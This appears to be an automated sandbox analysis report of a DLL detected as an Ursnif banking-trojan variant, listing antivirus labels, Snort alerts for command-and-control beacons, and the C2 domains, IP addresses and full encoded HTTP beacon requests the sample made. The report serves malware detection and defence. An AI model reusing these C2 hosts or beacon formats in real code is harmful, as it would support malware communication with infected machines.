Multi AV Scanner detection for domain / URL

Source: nnnnnn.bar	Virustotal: Detection: 12%	Perma Link
Source: nnnnnn.casa	Virustotal: Detection: 12%	Perma Link
Source: www.nnnnnn.casa	Virustotal: Detection: 7%	Perma Link

Machine Learning detection for sample

Source: Wartless_v8.8.9.0.dll

Joe Sandbox ML: detected

Source: 1.2.loaddll32.exe.10000000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 9.2.rundll32.exe.10000000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 5.2.regsvr32.exe.10000000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 6.2.rundll32.exe.10000000.3.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_010C4872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_04F94872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04214872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04444872 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

Source: Wartless_v8.8.9.0.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49756 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49798 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49798 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49801 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49801 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49802 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49804 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49812 -> 198.54.117.218:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49812 -> 198.54.117.218:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49814 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49813 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49815 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49819 -> 198.54.117.210:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49817 -> 198.54.117.210:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49817 -> 198.54.117.210:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49847 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49847 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49848 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49850 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49850 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49849 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49851 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49851 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49854 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49856 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49856 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49855 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49857 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49857 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49861 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49861 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49858 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49859 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49862 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49864 -> 162.255.119.177:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49864 -> 162.255.119.177:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49866 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49866 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49867 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49867 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49868 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49868 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49869 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49869 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49870 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49870 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49871 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49871 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49872 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49872 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49879 -> 162.255.119.177:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49879 -> 162.255.119.177:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49880 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49880 -> 198.54.117.211:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49882 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49882 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49883 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49883 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49884 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49884 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49885 -> 198.54.117.215:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49885 -> 198.54.117.215:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49886 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49886 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49887 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49887 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49888 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49889 -> 192.64.119.233:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49890 -> 198.54.117.210:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49891 -> 198.54.117.216:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49894 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49894 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49895 -> 31.41.46.120:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49895 -> 31.41.46.120:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 31.41.46.120 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: www.nnnnnn.casa
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 162.255.119.177 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: nnnnnn.casa
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: intermedia.bar
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 198.54.117.212 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: nnnnnn.bar
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.64.119.233 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 198.54.117.215 80
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 198.54.117.216 80

Source: Joe Sandbox View	ASN Name: ASRELINKRU ASRELINKRU
Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View	IP Address: 198.54.117.218 198.54.117.218
Source: Joe Sandbox View	IP Address: 198.54.117.210 198.54.117.210

Source: loaddll32.exe, 00000001.00000003.648024255.0000000001167000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.648253117.0000000001167000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.349565633.00000000034F1000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.648899790.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.460653574.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.565572741.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.648715352.00000000034F2000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.462177448.0000000002794000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.348654283.0000000002793000.00000004.00000001.sdmp	String found in binary or memory: http://intermedia.bar
Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	String found in binary or memory: http://intermedia.bar/
Source: regsvr32.exe, 00000005.00000003.519535406.00000000034F2000.00000004.00000001.sdmp	String found in binary or memory: http://intermedia.bar/drew/
Source: {5307E23B-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr	String found in binary or memory: http://intermedia.bar/drew/69qrrEp29jAiA/GVIxoy3h/ZRI0if101gbT_2Fcb5gsrod/7F17KHpa_2/BUS9AgcQP0bD4Ff
Source: regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810625001.00000000034DC000.00000004.00000020.sdmp	String found in binary or memory: http://intermedia.bar/drew/8GCWuTw3vFr_2BaLQHxEj/S2mZ_2Bs1ztZVt4J/tWEHNc4XanBwmnu/I2msIqz_2B6GZdxr2f
Source: {230EFA08-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr	String found in binary or memory: http://intermedia.bar/drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1
Source: {230EFA0C-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DFCD812BE71D10CCC1.TMP.15.dr	String found in binary or memory: http://intermedia.bar/drew/QIymR1NV/VEHDP0tzxYyfhToi28JN0gN/4iuWFUXiYW/K0CJrXj0tnUEhVH78/U3kVKnzlLrQ
Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp, loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	String found in binary or memory: http://intermedia.bar/drew/QsS2jHAM_/2BwJZccmdp5m9iHVP9BE/Hy_2Bb24NYz6UUYImCo/zrhZsMNoFc_2FvJseSFb87
Source: {230EFA0A-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DFA8E08E14F77016D9.TMP.15.dr	String found in binary or memory: http://intermedia.bar/drew/QvhYBaeq_2F6Kr5S5lD/OqLkixN3sRa2UpR8i3hjYq/eJ9NYRqvvouL5/5HWqGU6L/VANwgL_
Source: {230EFA0E-7AD2-11EC-90E9-ECF4BB862DED}.dat.15.dr, ~DF1843E87D640EF8CE.TMP.15.dr	String found in binary or memory: http://intermedia.bar/drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz
Source: ~DF83FDEC42C12270DC.TMP.37.dr, {5307E239-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr	String found in binary or memory: http://intermedia.bar/drew/eOqzQTB_2B/MowPwZPRMG1LVJR9t/fCLL0MMkzzZ7/Xm0aty4DHMK/aZD8fvqKlB4sn5/NqI7
Source: {5307E23D-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr	String found in binary or memory: http://intermedia.bar/drew/sJjHsvpax4Nzwn6/j_2BIK7xkvvLg0K_2B/rW_2F1MVm/0X2RDVp6mN6jHjHQXHVv/lXgIE5s
Source: {5307E23F-7AD2-11EC-90E9-ECF4BB862DED}.dat.37.dr, ~DF847B8575778877FD.TMP.37.dr	String found in binary or memory: http://intermedia.bar/drew/tN_2FPnM2JFaCc33jtc/NPCaV6rrqIxKNKP7n1AR3O/LMe16EhvI_2Bi/SLNSQXLS/EviOTr3
Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	String found in binary or memory: http://intermedia.bar/ws
Source: loaddll32.exe, 00000001.00000003.691476910.0000000001167000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.810696201.00000000034ED000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000003.692543438.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.691905249.00000000034F2000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.737248547.00000000034EE000.00000004.00000001.sdmp	String found in binary or memory: http://nnnnnn.bar
Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp	String found in binary or memory: http://nnnnnn.bar/.x
Source: ~DFD962CE55E98449E3.TMP.44.dr, {61A0A539-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr	String found in binary or memory: http://nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bg
Source: loaddll32.exe, 00000001.00000002.810955675.000000000320B000.00000004.00000010.sdmp	String found in binary or memory: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH8
Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	String found in binary or memory: http://nnnnnn.bar/drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd
Source: loaddll32.exe, 00000001.00000002.809447258.00000000010EB000.00000004.00000020.sdmp, ~DF7A63264CD3C88DE7.TMP.44.dr, {61A0A53D-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr	String found in binary or memory: http://nnnnnn.bar/drew/9KR1ePshh/VJe94rsZSf9_2B1_2Bzi/ojZaK0dpGSZRsGSTBXN/nAjWHF9ja2uIeAiO3gdvCi/301
Source: ~DF80E3D54E28E527BE.TMP.44.dr, {61A0A53B-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr	String found in binary or memory: http://nnnnnn.bar/drew/SAsRWWRcgAYbX5O/sPIUsFF8_2Fn2uMxzA/aS_2B1MFO/_2B9vtqo1M2_2FHU754_/2FIz_2FEDBV
Source: {61A0A53F-7AD2-11EC-90E9-ECF4BB862DED}.dat.44.dr, ~DF92A2674FCB111FAD.TMP.44.dr	String found in binary or memory: http://nnnnnn.bar/drew/knqRZpNvqk/sE_2FZx8OMLhPewzq/M4XZQB_2BkD8/vtpmyt2M_2F/KpLyILSZIke280/Mu0dWeXe
Source: regsvr32.exe, 00000005.00000002.811766322.0000000004F6B000.00000004.00000010.sdmp	String found in binary or memory: http://nnnnnn.bar/drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5
Source: {3EF5FA38-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.dr	String found in binary or memory: http://nnnnnn.casa/drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/F
Source: {3EF5FA36-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.dr	String found in binary or memory: http://nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5
Source: loaddll32.exe, 00000001.00000002.809730294.0000000001142000.00000004.00000020.sdmp	String found in binary or memory: http://nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP0gGd
Source: {3EF5FA3C-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.dr	String found in binary or memory: http://nnnnnn.casa/drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J
Source: {3EF5FA3A-7AD2-11EC-90E9-ECF4BB862DED}.dat.29.dr, ~DF1DF67103C7B135B0.TMP.29.dr	String found in binary or memory: http://nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LA
Source: loaddll32.exe, 00000001.00000002.809730294.0000000001142000.00000004.00000020.sdmp	String found in binary or memory: http://www.nnnnnn.casa/
Source: loaddll32.exe, 00000001.00000002.809814821.0000000001155000.00000004.00000020.sdmp	String found in binary or memory: http://www.nnnnnn.casa/drew/c0nPYFX4zb59h_2F/qctVP12WCFNRJoO/0H9NzUZripQLxYTbGd/R62DjUJbv/AkTvnBTIOP
Source: regsvr32.exe, 00000005.00000002.810669617.00000000034E5000.00000004.00000020.sdmp	String found in binary or memory: http://www.nnnnnn.casa/drew/kntGHlOf6y1l7K/kCTU1frsUdQxnhn_2Fego/mw6bJXLxnfIRL2cj/FrdUucpG93hhEy_/2F

Source: unknown

DNS traffic detected: queries for: intermedia.bar

Source: global traffic	HTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: intermedia.barConnection: Keep-Alive
